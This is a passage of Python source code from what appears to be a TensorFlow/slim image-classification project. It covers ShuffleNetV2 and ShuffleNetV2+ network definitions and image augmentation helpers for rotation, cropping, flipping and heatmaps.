x = slim.separable_conv2d(x,
num_outputs=None,
kernel_size=[3, 3],
stride=stride,
padding='VALID',
activation_fn=None,
normalizer_fn=slim.batch_norm,
scope='branch_main/'+main_scope[2])
x = slim.conv2d(x,
num_outputs=base_mid_channel,
kernel_size=[1, 1],
stride=1,
padding='VALID',
activation_fn=act_func,
normalizer_fn=slim.batch_norm,
scope='branch_main/'+main_scope[3])
x = torch_style_padding(x, 3)
x = slim.separable_conv2d(x,
num_outputs=None,
kernel_size=[3, 3],
stride=stride,
padding='VALID',
activation_fn=None,
normalizer_fn=slim.batch_norm,
scope='branch_main/'+main_scope[4])
x = slim.conv2d(x,
num_outputs=outputs,
kernel_size=[1, 1],
stride=1,
padding='VALID',
activation_fn=act_func,
normalizer_fn=slim.batch_norm,
scope='branch_main/'+main_scope[5])
if useSE and activation != 'ReLU':
x = se(x, outputs,scope='branch_main/'+se_scope[0])
if stride == 2:
x_proj = torch_style_padding(x_proj, 3)
x_proj = slim.separable_conv2d(x_proj,
num_outputs=None,
kernel_size=[3, 3],
stride=stride,
padding='VALID',
activation_fn=None,
normalizer_fn=slim.batch_norm,
scope='conv_dp_proj')
x_proj = slim.conv2d(x_proj,
num_outputs=inp,
kernel_size=[1, 1],
stride=1,
padding='VALID',
activation_fn=act_func,
normalizer_fn=slim.batch_norm,
scope='conv1x1_pw_proj')
res=tf.concat([x_proj,x],axis=3)
return res
def shufflenet_arg_scope(weight_decay=cfg.TRAIN.weight_decay_factor,
batch_norm_decay=0.9,
batch_norm_epsilon=1e-5,
batch_norm_scale=True,
use_batch_norm=True,
batch_norm_updates_collections=tf.GraphKeys.UPDATE_OPS):
"""Defines the default ResNet arg scope.
TODO(gpapan): The batch-normalization related default values above are
appropriate for use in conjunction with the reference ResNet models
released at https://github.com/KaimingHe/deep-residual-networks. When
training ResNets from scratch, they might need to be tuned.
Args:
weight_decay: The weight decay to use for regularizing the model.
batch_norm_decay: The moving average decay when estimating layer activation
statistics in batch normalization.
batch_norm_epsilon: Small constant to prevent division by zero when
normalizing activations by their variance in batch normalization.
batch_norm_scale: If True, uses an explicit `gamma` multiplier to scale the
activations in the batch normalization layer.
activation_fn: The activation function which is used in ResNet.
use_batch_norm: Whether or not to use batch normalization.
batch_norm_updates_collections: Collection for the update ops for
batch norm.
Returns:
An `arg_scope` to use for the resnet models.
"""
batch_norm_params = {
'decay': batch_norm_decay,
'epsilon': batch_norm_epsilon,
'scale': batch_norm_scale,
'updates_collections': batch_norm_updates_collections,
'fused': True, # Use fused batch norm if possible.
}
with slim.arg_scope(
[slim.conv2d,slim.separable_conv2d],
weights_regularizer=slim.l2_regularizer(weight_decay),
weights_initializer=slim.variance_scaling_initializer(),
biases_initializer=None,
normalizer_fn=slim.batch_norm if use_batch_norm else None,
normalizer_params=batch_norm_params,):
with slim.arg_scope([slim.batch_norm], **batch_norm_params):
# The following implies padding='SAME' for pool1, which makes feature
# alignment easier for dense prediction tasks. This is also used in
# https://github.com/facebook/fb.resnet.torch. However the accompanying
# code of 'Deep Residual Learning for Image Recognition' uses
# padding='VALID' for pool1. You can switch to that choice by setting
# slim.arg_scope([slim.max_pool2d], padding='VALID').
with slim.arg_scope([slim.max_pool2d], padding='SAME') as arg_sc:
return arg_sc
def ShufflenetV2Plus(inputs,is_training=True,model_size=cfg.MODEL.size,include_head=False):
architecture = [0, 0, 3, 1, 1, 1, 0, 0, 2, 0, 2, 1, 1, 0, 2, 0, 2, 1, 3, 2]
stage_repeats = [4, 4, 8, 4]
if model_size == 'Large':
stage_out_channels = [-1, 16, 68, 168, 336, 672, 1280]
elif model_size == 'Medium':
stage_out_channels = [-1, 16, 48, 128, 256, 512, 1280]
elif model_size == 'Small':
stage_out_channels = [-1, 16, 36, 104, 208, 416, 1280]
else:
raise NotImplementedError
fms=[]
arg_scope = shufflenet_arg_scope(weight_decay=cfg.TRAIN.weight_decay_factor)
with slim.arg_scope(arg_scope):
with slim.arg_scope([slim.batch_norm,slim.dropout], is_training=is_training):
with tf.variable_scope('ShuffleNetV2_Plus'):
input_channel = stage_out_channels[1]
inputs=torch_style_padding(inputs,3)
net = slim.conv2d(inputs,
16,
[3, 3],
stride=2,
padding='VALID',
activation_fn=hard_swish,
normalizer_fn=slim.batch_norm,
scope='first_conv/0')
archIndex=0
feature_cnt=0
for idxstage in range(len(stage_repeats)):
numrepeat = stage_repeats[idxstage]
output_channel = stage_out_channels[idxstage + 2]
activation = 'HS' if idxstage >= 1 else 'ReLU'
useSE = 'True' if idxstage >= 2 else False
for i in range(numrepeat):
with tf.variable_scope('features/%d'%(feature_cnt)):
if i == 0:
inp, outp, stride = input_channel, output_channel, 2
else:
inp, outp, stride = input_channel // 2, output_channel, 1
blockIndex = architecture[archIndex]
archIndex += 1
if blockIndex == 0:
print('Shuffle3x3')
net=shufflenet(net,inp, outp, base_mid_channels=outp // 2, ksize=3, stride=stride,
activation=activation, useSE=useSE,scope_index=feature_cnt)
elif blockIndex == 1:
print('Shuffle5x5')
net =shufflenet(net,inp, outp, base_mid_channels=outp // 2, ksize=5, stride=stride,
activation=activation, useSE=useSE,scope_index=feature_cnt)
elif blockIndex == 2:
print('Shuffle7x7')
net=shufflenet(net,inp, outp, base_mid_channels=outp // 2, ksize=7, stride=stride,
activation=activation, useSE=useSE,scope_index=feature_cnt)
elif blockIndex == 3:
print('Xception')
net=shufflenet_xception(net,inp, outp, base_mid_channels=outp // 2, stride=stride,
activation=activation, useSE=useSE,scope_index=feature_cnt)
else:
raise NotImplementedError
input_channel = output_channel
feature_cnt+=1
fms.append(net)
for item in fms:
print(item)
if not include_head:
return fms
if include_head:
x = slim.conv2d(net,
num_outputs=1280,
kernel_size=[1, 1],
stride=1,
padding='VALID',
activation_fn=hard_swish,
normalizer_fn=slim.batch_norm,
scope='conv_last/0')
x=tf.reduce_mean(x,axis=[1,2],keep_dims=True)
x=se(x,1280,scope='LastSE')
x = slim.conv2d(x,
num_outputs=1280,
kernel_size=[1, 1],
stride=1,
padding='VALID',
activation_fn=hard_swish,
normalizer_fn=None,
scope='fc/0')
x=slim.dropout(x,0.8,is_training=is_training)
x=slim.conv2d(x,
num_outputs=cfg.MODEL.cls,
kernel_size=[1, 1],
stride=1,
padding='VALID',
activation_fn=None,
normalizer_fn=None,
scope='classifier/0')
x=tf.squeeze(x, axis=1)
x = tf.squeeze(x, axis=1)
x=tf.identity(x,name='cls_output')
return x
```
#### File: net/shufflenet/shufflenetv2.py
```python
import tensorflow as tf
import tensorflow.contrib.slim as slim
from train_config import config as cfg
def torch_style_padding(inputs,kernel_size,rate=1):
'''
by default tensorflow use different padding method with pytorch,
so we need do explicit padding before we do conv or pool
:param inputs:
:param kernel_size:
:param rate:
:return:
'''
kernel_size_effective = kernel_size + (kernel_size - 1) * (rate - 1)
pad_total = kernel_size_effective - 1
pad_beg = pad_total // 2
pad_end = pad_total - pad_beg
inputs = tf.pad(inputs,
[[0, 0], [pad_beg, pad_end], [pad_beg, pad_end], [0, 0]])
return inputs
def shuffle(z):
# with tf.name_scope('shuffle_split'):
# shape = tf.shape(z)
# batch_size = shape[0]
# height, width = z.shape[1].value, z.shape[2].value
#
# depth = z.shape[3].value
#
# if cfg.MODEL.deployee:
# z = tf.reshape(z, [ height, width, 2, depth//2]) # shape [batch_size, height, width, 2, depth]
#
# z = tf.transpose(z, [0, 1, 3, 2])
#
# else:
# z = tf.reshape(z, [batch_size, height, width, 2, depth//2])# shape [batch_size, height, width, 2, depth]
#
# z = tf.transpose(z, [0, 1, 2, 4, 3])
#
# z = tf.reshape(z, [batch_size, height, width, depth])
# x, y = tf.split(z, num_or_size_splits=2, axis=3)
# return x, y
with tf.name_scope('shuffle_split'):
z=tf.transpose(z,perm=[0,3,1,2])
shape = tf.shape(z)
batch_size = shape[0]
height, width = z.shape[2].value, z.shape[3].value
depth = z.shape[1].value
if cfg.MODEL.deployee:
z = tf.reshape(z,[batch_size * depth // 2, 2, height * width]) # shape [batch_size, height, width, 2, depth]
z = tf.transpose(z, [1, 0, 2])
z = tf.reshape(z, [batch_size*2, depth // 2, height, width])
z = tf.transpose(z, perm=[0, 2, 3, 1])
x, y = tf.split(z, num_or_size_splits=2, axis=0)
else:
z = tf.reshape(z, [batch_size*depth//2,2, height* width])# shape [batch_size, height, width, 2, depth]
z = tf.transpose(z, [1,0,2])
z = tf.reshape(z, [batch_size*2, depth // 2, height , width])
z = tf.transpose(z, perm=[0, 2, 3, 1])
x, y = tf.split(z, num_or_size_splits=2, axis=0)
return x, y
def ShuffleV2Block(old_x,inp, oup, base_mid_channels, ksize, stride,scope_index=0):
main_scope_list=[['0','3','5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
]
project_scope_list=[['0','2'],
None,
None,
None,
['0', '2'],
None,
None,
None,
None,
None,
None,
None,
['0', '2'], #16
None,
None,
None,
]
main_scope=main_scope_list[scope_index]
project_scope = project_scope_list[scope_index]
if stride==1:
x_proj, x = shuffle(old_x)
else:
x_proj = old_x
x = old_x
base_mid_channel = base_mid_channels
outputs = oup - inp
act_func=tf.nn.relu
##branch main
x = slim.conv2d(x,
base_mid_channel,
[1, 1],
stride=1,
padding='VALID',
activation_fn=act_func,
normalizer_fn=slim.batch_norm,
biases_initializer=None,
scope='branch_main/'+main_scope[0])
x = torch_style_padding(x, ksize)
x = slim.separable_conv2d(x,
num_outputs=None,
kernel_size=[ksize, ksize],
stride=stride,
padding='VALID',
activation_fn=None,
normalizer_fn=slim.batch_norm,
scope='branch_main/'+main_scope[1])
x = slim.conv2d(x,
num_outputs=outputs,
kernel_size=[1, 1],
stride=1,
padding='VALID',
activation_fn=act_func,
normalizer_fn=slim.batch_norm,
scope='branch_main/'+main_scope[2])
if stride == 2:
x_proj = torch_style_padding(x_proj, ksize)
x_proj = slim.separable_conv2d(x_proj,
num_outputs=None,
kernel_size=[ksize, ksize],
stride=stride,
padding='VALID',
activation_fn=None,
normalizer_fn=slim.batch_norm,
scope='branch_proj/'+project_scope[0])
x_proj = slim.conv2d(x_proj,
num_outputs=inp,
kernel_size=[1, 1],
stride=1,
padding='VALID',
activation_fn=act_func,
normalizer_fn=slim.batch_norm,
scope='branch_proj/'+project_scope[1])
res=tf.concat([x_proj,x],axis=3)
return res
def shufflenet_arg_scope(weight_decay=cfg.TRAIN.weight_decay_factor,
batch_norm_decay=0.9,
batch_norm_epsilon=1e-5,
batch_norm_scale=True,
use_batch_norm=True,
batch_norm_updates_collections=tf.GraphKeys.UPDATE_OPS):
"""Defines the default ResNet arg scope.
TODO(gpapan): The batch-normalization related default values above are
appropriate for use in conjunction with the reference ResNet models
released at https://github.com/KaimingHe/deep-residual-networks. When
training ResNets from scratch, they might need to be tuned.
Args:
weight_decay: The weight decay to use for regularizing the model.
batch_norm_decay: The moving average decay when estimating layer activation
statistics in batch normalization.
batch_norm_epsilon: Small constant to prevent division by zero when
normalizing activations by their variance in batch normalization.
batch_norm_scale: If True, uses an explicit `gamma` multiplier to scale the
activations in the batch normalization layer.
activation_fn: The activation function which is used in ResNet.
use_batch_norm: Whether or not to use batch normalization.
batch_norm_updates_collections: Collection for the update ops for
batch norm.
Returns:
An `arg_scope` to use for the resnet models.
"""
batch_norm_params = {
'decay': batch_norm_decay,
'epsilon': batch_norm_epsilon,
'scale': batch_norm_scale,
'updates_collections': batch_norm_updates_collections,
'fused': True, # Use fused batch norm if possible.
}
with slim.arg_scope(
[slim.conv2d,slim.separable_conv2d],
weights_regularizer=slim.l2_regularizer(weight_decay),
weights_initializer=slim.variance_scaling_initializer(),
biases_initializer=None,
normalizer_fn=slim.batch_norm if use_batch_norm else None,
normalizer_params=batch_norm_params):
with slim.arg_scope([slim.batch_norm], **batch_norm_params):
# The following implies padding='SAME' for pool1, which makes feature
# alignment easier for dense prediction tasks. This is also used in
# https://github.com/facebook/fb.resnet.torch. However the accompanying
# code of 'Deep Residual Learning for Image Recognition' uses
# padding='VALID' for pool1. You can switch to that choice by setting
# slim.arg_scope([slim.max_pool2d], padding='VALID').
with slim.arg_scope([slim.max_pool2d], padding='SAME') as arg_sc:
return arg_sc
def ShufflenetV2(inputs,is_training=True,model_size=cfg.MODEL.size,include_head=False,keep_prob=1.):
stage_repeats = [4, 8, 4]
model_size = model_size
if model_size == '0.5x':
stage_out_channels = [-1, 24, 48, 96, 192, 1024]
elif model_size == '1.0x':
stage_out_channels = [-1, 24, 116, 232, 464, 1024]
elif model_size == '1.5x':
stage_out_channels = [-1, 24, 176, 352, 704, 1024]
elif model_size == '2.0x':
stage_out_channels = [-1, 24, 244, 488, 976, 2048]
else:
raise NotImplementedError
fms = []
arg_scope = shufflenet_arg_scope(weight_decay=cfg.TRAIN.weight_decay_factor)
with slim.arg_scope(arg_scope):
with slim.arg_scope([slim.batch_norm, slim.dropout], is_training=is_training):
with tf.variable_scope('ShuffleNetV2'):
input_channel = stage_out_channels[1]
inputs=torch_style_padding(inputs,3)
net = slim.conv2d(inputs,
24,
[3, 3],
stride=2,
padding='VALID',
activation_fn=tf.nn.relu,
normalizer_fn=slim.batch_norm,
scope='first_conv/0')
net = torch_style_padding(net, 3)
net = slim.max_pool2d(net,kernel_size=3,stride=2,padding='VALID')
fms = []
feature_cnt=0
for idxstage in range(len(stage_repeats)):
numrepeat = stage_repeats[idxstage]
output_channel = stage_out_channels[idxstage + 2]
for i in range(numrepeat):
with tf.variable_scope('features/%d' % (feature_cnt)):
if i == 0:
net=ShuffleV2Block(net,input_channel, output_channel,
base_mid_channels=output_channel // 2, ksize=3, stride=2,scope_index=feature_cnt)
else:
net=ShuffleV2Block(net,input_channel // 2, output_channel,
base_mid_channels=output_channel // 2, ksize=3, stride=1,scope_index=feature_cnt)
input_channel = output_channel
feature_cnt+=1
fms.append(net)
if not include_head:
return fms
if include_head:
x = slim.conv2d(net,
num_outputs=stage_out_channels[-1],
kernel_size=[1, 1],
stride=1,
padding='VALID',
activation_fn=tf.nn.relu,
normalizer_fn=slim.batch_norm,
scope='conv_last/0')
x=tf.reduce_mean(x,axis=[1,2],keep_dims=True)
if model_size == '2.0x' :
keep_prob=0.8
if keep_prob<1.:
x=slim.dropout(x,keep_prob)
x=slim.conv2d(x,
num_outputs=cfg.MODEL.cls,
kernel_size=[1, 1],
stride=1,
padding='VALID',
activation_fn=None,
normalizer_fn=None,
scope='classifier/0')
x = tf.squeeze(x, axis=1)
x = tf.squeeze(x, axis=1)
x = tf.identity(x,name='cls_output')
return x
```
#### File: dataset/augmentor/augmentation.py
```python
import numbers
import os
import warnings
import numpy as np
import cv2
import random
import math
from train_config import config as cfg
######May wrong, when use it check it
def Rotate_aug(src,angle,label=None,center=None,scale=1.0):
'''
:param src: src image
:param label: label should be numpy array with [[x1,y1],
[x2,y2],
[x3,y3]...]
:param angle:
:param center:
:param scale:
:return: the rotated image and the points
'''
image=src
(h, w) = image.shape[:2]
# 若未指定旋转中心,则将图像中心设为旋转中心
if center is None:
center = (w / 2, h / 2)
# 执行旋转
M = cv2.getRotationMatrix2D(center, angle, scale)
if label is None:
for i in range(image.shape[2]):
image[:,:,i] = cv2.warpAffine(image[:,:,i], M, (w, h),
flags=cv2.INTER_CUBIC,
borderMode=cv2.BORDER_CONSTANT,
borderValue=0.)
return image,None
else:
label=label.T
####make it as a 3x3 RT matrix
full_M=np.row_stack((M,np.asarray([0,0,1])))
img_rotated = cv2.warpAffine(image, M, (w, h), flags=cv2.INTER_CUBIC,
borderMode=cv2.BORDER_CONSTANT, borderValue=cfg.DATA.PIXEL_MEAN)
###make the label as 3xN matrix
full_label = np.row_stack((label, np.ones(shape=(1,label.shape[1]))))
label_rotated=np.dot(full_M,full_label)
label_rotated=label_rotated[0:2,:]
#label_rotated = label_rotated.astype(np.int32)
label_rotated=label_rotated.T
return img_rotated,label_rotated
def Rotate_coordinate(label,rt_matrix):
if rt_matrix.shape[0]==2:
rt_matrix=np.row_stack((rt_matrix, np.asarray([0, 0, 1])))
full_label = np.row_stack((label, np.ones(shape=(1, label.shape[1]))))
label_rotated = np.dot(rt_matrix, full_label)
label_rotated = label_rotated[0:2, :]
return label_rotated
def box_to_point(boxes):
'''
:param boxes: [n,x,y,x,y]
:return: [4n,x,y]
'''
##caution the boxes are ymin xmin ymax xmax
points_set=np.zeros(shape=[4*boxes.shape[0],2])
for i in range(boxes.shape[0]):
points_set[4 * i]=np.array([boxes[i][0],boxes[i][1]])
points_set[4 * i+1] =np.array([boxes[i][0],boxes[i][3]])
points_set[4 * i+2] =np.array([boxes[i][2],boxes[i][3]])
points_set[4 * i+3] =np.array([boxes[i][2],boxes[i][1]])
return points_set
def point_to_box(points):
boxes=[]
points=points.reshape([-1,4,2])
for i in range(points.shape[0]):
box=[np.min(points[i][:,0]),np.min(points[i][:,1]),np.max(points[i][:,0]),np.max(points[i][:,1])]
boxes.append(box)
return np.array(boxes)
def Rotate_with_box(src,angle,boxes=None,center=None,scale=1.0):
'''
:param src: src image
:param label: label should be numpy array with [[x1,y1],
[x2,y2],
[x3,y3]...]
:param angle:angel
:param center:
:param scale:
:return: the rotated image and the points
'''
label=box_to_point(boxes)
image=src
(h, w) = image.shape[:2]
# 若未指定旋转中心,则将图像中心设为旋转中心
if center is None:
center = (w / 2, h / 2)
# 执行旋转
M = cv2.getRotationMatrix2D(center, angle, scale)
new_size=Rotate_coordinate(np.array([[0,w,w,0],
[0,0,h,h]]), M)
new_h,new_w=np.max(new_size[1])-np.min(new_size[1]),np.max(new_size[0])-np.min(new_size[0])
scale=min(h/new_h,w/new_w)
M = cv2.getRotationMatrix2D(center, angle, scale)
if boxes is None:
for i in range(image.shape[2]):
image[:,:,i] = cv2.warpAffine(image[:,:,i], M, (w, h), flags=cv2.INTER_CUBIC, borderMode=cv2.BORDER_CONSTANT)
return image,None
else:
label=label.T
####make it as a 3x3 RT matrix
full_M=np.row_stack((M,np.asarray([0,0,1])))
img_rotated = cv2.warpAffine(image, M, (w, h), flags=cv2.INTER_CUBIC, borderMode=cv2.BORDER_CONSTANT)
###make the label as 3xN matrix
full_label = np.row_stack((label, np.ones(shape=(1,label.shape[1]))))
label_rotated=np.dot(full_M,full_label)
label_rotated=label_rotated[0:2,:]
#label_rotated = label_rotated.astype(np.int32)
label_rotated=label_rotated.T
boxes_rotated = point_to_box(label_rotated)
return img_rotated,boxes_rotated
###CAUTION:its not ok for transform with label for perspective _aug
def Perspective_aug(src,strength,label=None):
image = src
pts_base = np.float32([[0, 0], [300, 0], [0, 300], [300, 300]])
pts1=np.random.rand(4, 2)*random.uniform(-strength,strength)+pts_base
pts1=pts1.astype(np.float32)
#pts1 =np.float32([[56, 65], [368, 52], [28, 387], [389, 398]])
M = cv2.getPerspectiveTransform(pts1, pts_base)
trans_img = cv2.warpPerspective(image, M, (src.shape[1], src.shape[0]))
label_rotated=None
if label is not None:
label=label.T
full_label = np.row_stack((label, np.ones(shape=(1, label.shape[1]))))
label_rotated = np.dot(M, full_label)
label_rotated=label_rotated.astype(np.int32)
label_rotated=label_rotated.T
return trans_img,label_rotated
def Affine_aug(src,strength,label=None):
image = src
pts_base = np.float32([[10,100],[200,50],[100,250]])
pts1 = np.random.rand(3, 2) * random.uniform(-strength, strength) + pts_base
pts1 = pts1.astype(np.float32)
M = cv2.getAffineTransform(pts1, pts_base)
trans_img = cv2.warpAffine(image, M, (image.shape[1], image.shape[0]) ,
borderMode=cv2.BORDER_CONSTANT,
borderValue=cfg.DATA.PIXEL_MEAN)
label_rotated=None
if label is not None:
label=label.T
full_label = np.row_stack((label, np.ones(shape=(1, label.shape[1]))))
label_rotated = np.dot(M, full_label)
#label_rotated = label_rotated.astype(np.int32)
label_rotated=label_rotated.T
return trans_img,label_rotated
def Padding_aug(src,max_pattern_ratio=0.05):
src=src.astype(np.float32)
pattern=np.ones_like(src)
ratio = random.uniform(0, max_pattern_ratio)
height,width,_=src.shape
if random.uniform(0,1)>0.5:
if random.uniform(0, 1) > 0.5:
pattern[0:int(ratio*height),:,:]=0
else:
pattern[height-int(ratio * height):, :, :] = 0
else:
if random.uniform(0, 1) > 0.5:
pattern[:,0:int(ratio * width), :] = 0
else:
pattern[:,width-int(ratio * width):, :] = 0
bias_pattern=(1-pattern)*cfg.DATA.PIXEL_MEAN
img=src*pattern+bias_pattern
img=img.astype(np.uint8)
return img
def Blur_heatmaps(src, ksize=(3, 3)):
for i in range(src.shape[2]):
src[:, :, i] = cv2.GaussianBlur(src[:, :, i], ksize, 0)
amin, amax = src[:, :, i].min(), src[:, :, i].max() # 求最大最小值
if amax>0:
src[:, :, i] = (src[:, :, i] - amin) / (amax - amin) # (矩阵元素-最小值)/(最大值-最小值)
return src
def Blur_aug(src,ksize=(3,3)):
for i in range(src.shape[2]):
src[:, :, i]=cv2.GaussianBlur(src[:, :, i],ksize,1.5)
return src
def Img_dropout(src,max_pattern_ratio=0.05):
width_ratio = random.uniform(0, max_pattern_ratio)
height_ratio = random.uniform(0, max_pattern_ratio)
width=src.shape[1]
height=src.shape[0]
block_width=width*width_ratio
block_height=height*height_ratio
width_start=int(random.uniform(0,width-block_width))
width_end=int(width_start+block_width)
height_start=int(random.uniform(0,height-block_height))
height_end=int(height_start+block_height)
src[height_start:height_end,width_start:width_end,:]=0.
return src
def Fill_img(img_raw,target_height,target_width,label=None):
###sometimes use in objs detects
channel=img_raw.shape[2]
raw_height = img_raw.shape[0]
raw_width = img_raw.shape[1]
if raw_width / raw_height >= target_width / target_height:
shape_need = [int(target_height / target_width * raw_width), raw_width, channel]
img_fill = np.zeros(shape_need, dtype=img_raw.dtype)+np.array(cfg.DATA.PIXEL_MEAN ,dtype=img_raw.dtype)
shift_x=(img_fill.shape[1]-raw_width)//2
shift_y=(img_fill.shape[0]-raw_height)//2
for i in range(channel):
img_fill[shift_y:raw_height+shift_y, shift_x:raw_width+shift_x, i] = img_raw[:,:,i]
else:
shape_need = [raw_height, int(target_width / target_height * raw_height), channel]
img_fill = np.zeros(shape_need, dtype=img_raw.dtype)+np.array(cfg.DATA.PIXEL_MEAN ,dtype=img_raw.dtype)
shift_x = (img_fill.shape[1] - raw_width) // 2
shift_y = (img_fill.shape[0] - raw_height) // 2
for i in range(channel):
img_fill[shift_y:raw_height + shift_y, shift_x:raw_width + shift_x, i] = img_raw[:, :, i]
if label is None:
return img_fill,shift_x,shift_y
else:
label[:,0]+=shift_x
label[:, 1]+=shift_y
return img_fill,label
class RandomResizedCrop(object):
### torch_convert codes
"""Crop the given PIL Image to random size and aspect ratio.
A crop of random size (default: of 0.08 to 1.0) of the original size and a random
aspect ratio (default: of 3/4 to 4/3) of the original aspect ratio is made. This crop
is finally resized to given size.
This is popularly used to train the Inception networks.
Args:
size: expected output size of each edge
scale: range of size of the origin size cropped
ratio: range of aspect ratio of the origin aspect ratio cropped
interpolation: Default: PIL.Image.BILINEAR
"""
def __init__(self, size, scale=(0.08, 1.0), ratio=(3. / 4., 4. / 3.)):
if isinstance(size, (tuple, list)):
self.size = size
else:
self.size = (size, size)
if (scale[0] > scale[1]) or (ratio[0] > ratio[1]):
warnings.warn("range should be of kind (min, max)")
self.scale = scale
self.ratio = ratio
@staticmethod
def get_params(img, scale, ratio):
"""Get parameters for ``crop`` for a random sized crop.
Args:
img (PIL Image): Image to be cropped.
scale (tuple): range of size of the origin size cropped
ratio (tuple): range of aspect ratio of the origin aspect ratio cropped
Returns:
tuple: params (i, j, h, w) to be passed to ``crop`` for a random
sized crop.
"""
width, height = img.shape[1],img.shape[0]
area = height * width
for _ in range(10):
target_area = random.uniform(*scale) * area
log_ratio = (math.log(ratio[0]), math.log(ratio[1]))
aspect_ratio = math.exp(random.uniform(*log_ratio))
w = int(round(math.sqrt(target_area * aspect_ratio)))
h = int(round(math.sqrt(target_area / aspect_ratio)))
if 0 < w <= width and 0 < h <= height:
i = random.randint(0, height - h)
j = random.randint(0, width - w)
return i, j, h, w
# Fallback to central crop
in_ratio = float(width) / float(height)
if (in_ratio < min(ratio)):
w = width
h = int(round(w / min(ratio)))
elif (in_ratio > max(ratio)):
h = height
w = int(round(h * max(ratio)))
else: # whole image
w = width
h = height
i = (height - h) // 2
j = (width - w) // 2
return i, j, h, w
def __call__(self, img):
"""
Args:
img (PIL Image): Image to be cropped and resized.
Returns:
PIL Image: Randomly cropped and resized image.
"""
i, j, h, w = self.get_params(img, self.scale, self.ratio)
target_img = img[i:i + h, j:j + w, :]
interp_methods = [cv2.INTER_LINEAR, cv2.INTER_CUBIC, cv2.INTER_AREA, cv2.INTER_NEAREST,
cv2.INTER_LANCZOS4]
interp_method = random.choice(interp_methods)
target_img = cv2.resize(target_img, (self.size[1], self.size[0]), interpolation=interp_method)
return target_img
class CenterCrop(object):
"""Crops the given PIL Image at the center.
Args:
size (sequence or int): Desired output size of the crop. If size is an
int instead of sequence like (h, w), a square crop (size, size) is
made.
"""
def __init__(self, target_size,resize_size=256):
if isinstance(target_size, numbers.Number):
self.size = (int(target_size), int(target_size))
else:
self.size = target_size
self.resizer=OpencvResize(resize_size)
def __call__(self, img):
"""
Args:
img (PIL Image): Image to be cropped.
Returns:
PIL Image: Cropped image.
"""
img=self.resizer(img)
image_width, image_height = img.shape[1],img.shape[0]
crop_height, crop_width = self.size[0],self.size[1]
crop_top = int(round((image_height - crop_height) / 2.))
crop_left = int(round((image_width - crop_width) / 2.))
center_croped_img=img[crop_top:crop_top+crop_height,crop_left:crop_left+crop_width,:]
return center_croped_img
def __repr__(self):
return self.__class__.__name__ + '(size={0})'.format(self.size)
class OpencvResize(object):
def __init__(self, size=256):
self.size = size
def __call__(self, img):
img = np.ascontiguousarray(img)
H, W, _ = img.shape
target_size = (int(self.size/H * W + 0.5), self.size) if H < W else (self.size, int(self.size/W * H + 0.5))
img = cv2.resize(img, target_size, interpolation=cv2.INTER_LINEAR)
img = np.ascontiguousarray(img)
return img
def box_in_img(img,boxes,min_overlap=0.5):
raw_bboxes = np.array(boxes)
face_area=(boxes[:,3]-boxes[:,1])*(boxes[:,2]-boxes[:,0])
h,w,_=img.shape
boxes[:, 0][boxes[:, 0] <=0] =0
boxes[:, 0][boxes[:, 0] >=w] = w
boxes[:, 2][boxes[:, 2] <= 0] = 0
boxes[:, 2][boxes[:, 2] >= w] = w
boxes[:, 1][boxes[:, 1] <= 0] = 0
boxes[:, 1][boxes[:, 1] >= h] = h
boxes[:, 3][boxes[:, 3] <= 0] = 0
boxes[:, 3][boxes[:, 3] >= h] = h
boxes_in = []
for i in range(boxes.shape[0]):
box=boxes[i]
if ((box[3]-box[1])*(box[2]-box[0]))/face_area[i]>min_overlap :
boxes_in.append(boxes[i])
boxes_in = np.array(boxes_in)
return boxes_in
def Random_scale_withbbox(image,bboxes,target_shape,jitter=0.5):
###the boxes is in ymin,xmin,ymax,xmax mode
hi, wi, _ = image.shape
while 1:
if len(bboxes)==0:
print('errrrrrr')
bboxes_=np.array(bboxes)
crop_h = int(hi * random.uniform(0.2, 1))
crop_w = int(wi * random.uniform(0.2, 1))
start_h = random.randint(0, hi - crop_h)
start_w = random.randint(0, wi - crop_w)
croped = image[start_h:start_h + crop_h, start_w:start_w + crop_w, :]
bboxes_[:, 0] = bboxes_[:, 0] - start_w
bboxes_[:, 1] = bboxes_[:, 1] - start_h
bboxes_[:, 2] = bboxes_[:, 2] - start_w
bboxes_[:, 3] = bboxes_[:, 3] - start_h
bboxes_fix=box_in_img(croped,bboxes_)
if len(bboxes_fix)>0:
break
###use box
h,w=target_shape
croped_h,croped_w,_=croped.shape
croped_h_w_ratio=croped_h/croped_w
rescale_h=int(h * random.uniform(0.5, 1))
rescale_w = int(rescale_h/(random.uniform(0.7, 1.3)*croped_h_w_ratio))
rescale_w=np.clip(rescale_w,0,w)
image=cv2.resize(croped,(rescale_w,rescale_h))
new_image=np.zeros(shape=[h,w,3],dtype=np.uint8)
dx = int(random.randint(0, w - rescale_w))
dy = int(random.randint(0, h - rescale_h))
new_image[dy:dy+rescale_h,dx:dx+rescale_w,:]=image
bboxes_fix[:, 0] = bboxes_fix[:, 0] * rescale_w/ croped_w+dx
bboxes_fix[:, 1] = bboxes_fix[:, 1] * rescale_h / croped_h+dy
bboxes_fix[:, 2] = bboxes_fix[:, 2] * rescale_w / croped_w+dx
bboxes_fix[:, 3] = bboxes_fix[:, 3] * rescale_h / croped_h+dy
return new_image,bboxes_fix
def Random_flip(im, boxes):
im_lr = np.fliplr(im).copy()
h,w,_ = im.shape
xmin = w - boxes[:,2]
xmax = w - boxes[:,0]
boxes[:,0] = xmin
boxes[:,2] = xmax
return im_lr, boxes
def Mirror(src,label=None,symmetry=None):
img = cv2.flip(src, 1)
if label is None:
return img,None
width=img.shape[1]
cod = []
allc = []
for i in range(label.shape[0]):
x, y = label[i][0], label[i][1]
if x >= 0:
x = width - 1 - x
cod.append((x, y))
# **** the joint index depends on the dataset ****
for (q, w) in symmetry:
cod[q], cod[w] = cod[w], cod[q]
for i in range(label.shape[0]):
allc.append(cod[i][0])
allc.append(cod[i][1])
label = np.array(allc).reshape(label.shape[0], 2)
return img,label
def produce_heat_maps(label,map_size,stride,sigma):
def produce_heat_map(center,map_size,stride,sigma):
grid_y = map_size[0] // stride
grid_x = map_size[1] // stride
start = stride / 2.0 - 0.5
y_range = [i for i in range(grid_y)]
x_range = [i for i in range(grid_x)]
xx, yy = np.meshgrid(x_range, y_range)
xx = xx * stride + start
yy = yy * stride + start
d2 = (xx - center[0]) ** 2 + (yy - center[1]) ** 2
exponent = d2 / 2.0 / sigma / sigma
